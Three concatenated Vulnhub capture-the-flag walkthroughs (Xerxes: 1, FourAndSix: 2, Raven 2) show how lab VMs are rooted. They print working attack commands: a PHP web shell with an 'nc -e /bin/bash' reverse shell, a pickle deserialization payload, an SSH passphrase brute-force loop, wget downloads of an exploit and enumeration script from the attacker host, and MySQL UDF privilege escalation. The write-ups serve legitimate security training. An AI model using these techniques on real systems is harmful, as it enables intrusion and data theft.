Xerxes: 1 Vulnhub Walkthrough

Welcome to another boot2root CTF challenge “Xerxes: 1” uploaded by bas on vulnhub. As, there is a theme, and you will need to snag the flag in order to complete the challenge and you can download it from the given below link:

 https://download.vulnhub.com/xerxes/xerxes.tar.gz

By author, it has a good variety of techniques needed to get root – no exploit development/buffer overflows. So, on the basis of our experience and knowledge, we have made progress in solving the lab.

Level: Beginner

Penetrating Methodologies:

• Network scanning (Nmap)
• Surfing HTTP web services
• Directory bruteforcing (Dirb)
• Base64 decoding
• Gimp Editor to zoom image and find the hint
• Decimal to ASCII, Brainfuck decrypting
• Search and Capture the flag at various stages

Walkthrough

First step is as always, running netdiscover on the VM to grab the IP address. In my case the IP was 192.168.1.102.

Now, let us run a scan on the discovered IP address to see the available ports

nmap -A 192.168.1.102

From the nmap scan result, we found port 80 is open for http service, let’s navigate to port 80 in the browser.

When we didn’t found any remarkable clue from its home page, then without wasting much time, I use dirb for web directory enumeration and ran the following command:

dirb http://192.168.1.102

From the above scan we found that there is another directory /dev, so let’s browse it.

http://192.168.1.102/dev

Here we found the link for forgot password, so we will browse it to see if there is something useful.

To our surprise, there is a QR code, so let’s scan it to see what it hidden inside. On scanning QR code we found a base64 encoded text.

Now let’s decode the base64 string to find if there is any hint or useful information available.

The clue said look deeper, so we tried to zoom the image and found that there are some different pixels on the top left of the image. To read that we used the color-picker tool in the GIMP editor. To do this, we used Gimp Editor tool and used the option Open in Layers in the File menu, after that we deselected all the layers except the alpha layer of the image, then used the Color-Picker tool from the Tools menu to find the alpha values of the pixels

After collecting all the alpha values, we'll find the ASCII characters of the decimal values we found.

Now, we came to know that the ascii chars are actually the a base64 encoded value, so let’s decrypt and see what we get

After decoding the base64 we found that it is another encryption named BrainFuck, let’s try to decrypt the BrainFuck encrypted string.

Now let us try to use this value as password to upload our file, after trying to upload php shell, we tried to upload shell in “pht” extension

Now access the shell from URL and run ls command to check if the shell has created the RCE vulnerability.

Since it was vulnerable to RCE, therefore we can exploit the victim’s machine by executing following command.

http://192.168.1.102/dev/upload/shell.pht?cmd=nc –e/bin/bash 192.168.1.109 1234

On the other hand, keep the netcat listener active on the kali terminal,

nc -lvp 1234

As soon as we get our reverse connection, first thing we do is to upgrade our session into a more interactive one, so we will use python one-liner to upgrade our session from sh to bash

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Now let’s go to home and find the number of users

cd /home

ls

Here we found that there are 3 users named amanpour, curtiz and Delacroix, we will first head in amanpour and check the contents

cd amanpour

ls -la

Here we found .bash_history file, now we will check the contents of the file

cat .bash_history

In this file you will find the python command for new password, run the command and you will find the password

python steqr.py -f newpassword

Now we got the password of amanpour so lets try to connect to amanpour using these credentials

ssh amanpour@192.168.1.102

Here we will search for files with suid permissions

find / -perm -4000 -type f 2>/dev/null

here we found file /opt/notes, so let’s go in /opt file to find the files inside it, here along with notes we will also find notes.py, so we will see the contents of notes.py file.

cd /opt

ls

cat notes.py

Here we will find out that whatever the file needs to be loaded in the notes executable should either be in /home/curtiz or the filepath should start with ../../ as to first go to directory backwards and then provide full path from /

In notes.py we find that the script is using pickle module. Now the pickle module is vulnerable to insecure deserialization. So we can execute any code of our choice. As we can load the file in the script we created a file that executes “/bin/sh”

cat > /tmp/shell

cos

system

(S’/bin/sh’

tR.

Now execute the notes executable file and load the shell file directly from tmp directory

./notes

load ../../tmp/shell

As soon we run load /tmp/shell we spawn a shell and when we checked the id, we found that the amanpour is also a member of curtiz group, so we will now go to curtiz home directory

cd /home/curtiz

When we check the content of the directory, we find a file called notes. We take look at the content of notes and find a hint to login through user Marie.

ls

cat notes

We check passwd file to find if user “Marie” exists. After opening the file, we find that the “Marie” is the first name for user “delacroix”. We also find that it uses a custom shell called “/bin/delacroix”.

cat /etc/passwd | grep “Marie”

Now lets see the contents of “/bin/delacroix” using strings function, here you’ll find a md5 hash

strings /bin/delacroix

Now let’s decrypt the md5 value online, it will give us the result as “VonBraun”.

Now let’s try to connect as Delacroix via SSH with this password, but we are unable to successfully login.

ssh delacroix@192.168.1.102

In /home/curtiz directory, there was a file called id_rsa. We check the content of the file and find it is RSA private key.

cat id_rsa

We copy the RSA key from the target machine to our machine. Now when we login through SSH using the private key.

ssh -i id_rsa delacroix@192.168.1.102

After logging in, we will check the contents of the “/home/delacroix” directory only to discover two files check.sh and generate.sh. “check.sh” script provides the customized login message. The script “generate.sh” creates a new “.last” file and uses the timestamp of the file to generate a unique md5.

So now we will need to find the md5 hash value of the creation time of “.last” file, for that first we will use stat command to check  the time when  the file was created

stat .last

After getting the timestamp of “.last” file, it’s time to get the md5 hash value, for this we’ll use md5sum function along with echo command to get md5 hash. We are going to use the time at which marie created the file

echo 00:19:51 |md5sum

Now we have the password too, so let’s capture the flag, open the root terminal using sudo bash command along with the password we found and BOOM. You’re logged in as root now.

Look around to find the flag now, use cd command to go to the root directory and use ls to check the contents of the directory. You will find file flag here.

cd /root

ls

When we see the type of flag file, it displayed that it is an png image data

file flag

Let’s use netcat to transfer this file to our kali machine

nc 192.168.1.109 5555 < flag

In the meanwhile you should also start netcat listener in the kali machine with directing the incoming file to a new file

nc -lvp 5555 > flag

Now finally we open the flag file and it’s done

FourAndSix: 2 Vulnhub Walkthrough

FourAndSix: 2 is the sequel for previously solved vulnerable machine FourAndSix by Fred uploaded on vulnhub. It is not mandatory but is advised to read the prequel of this lab here. You can download the FourAndSix:2 vulnerable lab from here. The challenge is to become root and read flag.txt in the same directory.

Table of contents:

·         Discovery of IP address.

·         Scanning for open ports and services.

·         Discovering universally accessible directory in victim’s machine.

·         Cracking the password of archive found in storage partition.

·         Reading the pub file and logging in using ssh.

·         Discovering utilities with sticky bit on them.

·         Using doas to get root.

·         Snagging the flag!

·         Let’s get started then.

First step is, as usual, to find the IP of the target machine. In this case it is 192.168.1.103

Next we discover open ports and services using nmap. The ports open were 22, 111, 2049.

There was only one way to proceed and that is port 2049. So, we used showmount command to check for nfs shared partitions.

Later, we mounted it under the folder name “raj” using the mount command. And we found a 7z compressed file.

Showmount –e 192.168.1.103

Mount –t nfs 192.168.1.103:/home/user/storage raj

But the file “backup.7z” was unfortunately password protected.

So, after trying out a number of options like John The Ripper and etc. and getting zero success, we found a site online to break it’s password.

The password was found to be: chocolate

We extracted its contents in the same folder and found a few images along with RSA keys. As port 22 is running SSH service on the target machine, we can use RSA private key to login. We open RSA public key to take a look at the username.

cat id_rsa.pub

We tried logging in to ssh but it was asking for a passphrase. So, we created the following script to find the correct password.

cat /usr/share/wordlists/metasploit/adobe_top100_pass.txt | while read pass; do if ssh-keygen –c –C “user@forandsix” –P $pass –f id_rsa &>/dev/null; then echo $pass; break; fi; done

From the id_rsa.pub file we found the user for the secure shell of victim and logged in to it. The password was: “12345678”.

Ssh –I id_rsa user@192.168.1.103

We used the find utility to discover files or packages with suid bit set on them.

Find / -perm –u=s –type f 2>/dev/null

We found an interesting utility with suid bit: /usr/bin/doas which is an alternate to sudo.

After reading the “doas.conf” file, we find that “less” can be run as root.

Let’s pick the configuration file and try to understand it word by word. Doas utility executes commands as other users according to the rules in doas.conf configuration file.

Permit/Deny: allows the rule.

Nopass: user is not required to enter any password.

Persist: After the user successfully authenticates, do not ask for a password again for some time.

Keepenv: The user’s environment is maintained.

Cmd: command is allowed to run.

Since, doas configuration file says that less can be run with no password at all as root with no password, it can be used for shell escaping.

Doas /usr/bin/less /var/log/authlog

Enter v to escape to vi and then “!sh” to escape to our brand new shell.

The final step was to snag the flag! It was in root directory as told by the creator of the VM.

Id shows that the shell is root shell and finally we read the congratulatory flag using cat!

So this was how we root the FourAndSix:2. Hope you liked it.

Raven 2: Vulnhub Walkthrough

Hello everyone and welcome to yet another CTF challenge walkthrough. This time we’ll be putting our hands on Raven 2. It is the sequel to previously solved Raven. Raven 2 is a Beginner/Intermediate boot2root machine. The goal is to snag 4 flags and get the root on target VM.

Table of contents:

1.      Port scanning and IP discovery.

2.      Hitting on port 80 and discovery of WordPress CMS.

3.      Directory enumeration to find a directory “vendor.”

4.      Discovering a file PATH to snag flag 1.

5.      Discovering a file VERSION to snag the PHP version.

6.      Exploiting RCE in PHP version 5.2.6

7.      Making local changes in the exploit code for successful delivery of payload.

8.      Getting a netcat shell using the uploaded payload.

9.      Snagging flag 2 in /var/www

10.  Reading database password from wp-config file.

11.  Running LinEnum.sh to enumerate processes.

12.  Exploiting UDF dynamic library vulnerability using an exploit with codename 1518.c on exploit-db

13.  Setting sticky bit on find.

14.  Getting root access.

15.  Snagging flag4 in /root

16.  Manually traversing system to find flag3.

Let’s get started then!

Discovering the active devices on a network using netdiscover and getting the IP address of our victim machine. In this case the IP address holds 192.168.1.101

Using nmap on the victim machine we got three ports open—22,80 and 111

So we instantly moved to the port 80 and discovered a website of Raven Security.

We thought it would be wise to run a directory test before we scan anything else. So we ran a directory buster test to find “vendor” directory in the victim machine.

Accessing /vendor the following files and folders came out.

Among them a file called PATH caught our attention since it is no ordinary name. So we opened it in the browser only to find flag1!

There was yet another file worth noting called VERSION. On opening it we found the version of something. It was unclear which software had version 5.2.6 but look at the previous screen again… A file exists called: PHPMailerAutoload.php. It is fairly certain now that version 5.2.6 was of PHPMailer. So, on a bit of internet surfing we found an RCE exploit for the version!

Now we downloaded this python file but don’t run it yet! There are some changes to be made which are highlighted in the screen below.

1.      A coding: utf-8 tag is to be added at the top.

2.      Set the target of vulnerability to 192.168.1.101/contact.php where this vulnerability exists (read PHPMailer’s function).

3.      Set the backdoor’s name. Let it be backdoor.php for now.

4.      Set the local IP in the Subprocess call.

5.      And finally, the location to upload the backdoor in.

Now run this python script and wait for the success message.

Activate a netcat listener on port 443. It is because the backdoor gives a connection on port 443 as written in the python code (Subprocess call).

Upon opening the location of backdoor we immediately got a shell!

Now we imported a proper teletype by using the python one liner and manually traversed to /var/www only to discover flag2!

Python –c ‘import pty;pty.spawn(“/bin/bash”)’

Cd /var/www

Cat flag2.txt

Now we thought of checking the wordpress directory as we done in the prequel Raven 1.

Cd /var/www/html/wordpress

Cat wp-config.php

We found the root database password! It was “R@v3nSecurity”

Then we changed the active directory to /tmp and imported LinEnum.sh, a script to enumerate many of the basic and advanced linux details.

It was hosted in a folder on our local machine and was imported into the victim machine using wget command.

My local IP address was 192.168.1.109 in this case.

Cd /tmp

Wget http://192.168.1.109/LinEnum.sh

Chmod 777 LinEnum.sh

./LinEnum.sh

We found a MySQL-Exploit-Remote-Root-Code-Execution-Privesc vulnerability! (FOR MORE INFO: https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html)

So, we searched for a UDF dynamic library exploit and it was named “1518.c” in exploit database.

https://www.exploit-db.com/exploits/1518/

The exploits run by compiling the raw C code to .so file and then transferring it to the victim machine and exploiting MySQL vulnerability.

The first step was to compile it.

Searchsploit –m 1518.c

gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518. –lc

And hence, we transferred this “.so” file in the /tmp directory in victim’s machine.

wget http://192.168.1.109/1518.so

chmod 777 1518.so

Now we logged in to the mysql interface.

mysql –u root –p

After getting a MySQL shell, we started exploiting it using the vulnerability we just found

use mysql;

Now, we created a table called “foo”

In this table, we inserted the link to the 1518.so file we just imported from local machine to /tmp directory.

We dumped the same file to /usr/lib/mysql/plugin/ directory (since it was vulnerable)

In the most important step, we created a UDF function named do_system, that will invoke the code that implements the function.

Hence, we are invoking the code “chmod u+s /usr/bin/find” to set the sticky bit on “find”

create table foo(line blob);

insert into foo values(load_file('/tmp/1518.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';

create function do_system returns integer soname '1518.so';

select do_system('chmod u+s /usr/bin/find');

Now we traversed back to the directory /tmp and executed commands using the find utility.

Touch raj

Find raj –exec “whoami” \;

Find raj –exec “/bin/sh” \;

Cd /root

Ls

Cat flag4.txt

Only flag left to find was flag3.txt. You can do this with find utility but we had a bit of luck and found it manually!

It was lying in /var/www/html/wp-content/uploads/2018/11

We copied it in /var/www/html using cp.

Since it was a png file we had to view it on browser.

Hence, this is how we rooted Raven 2 and snagged all four flags! Hope you liked it!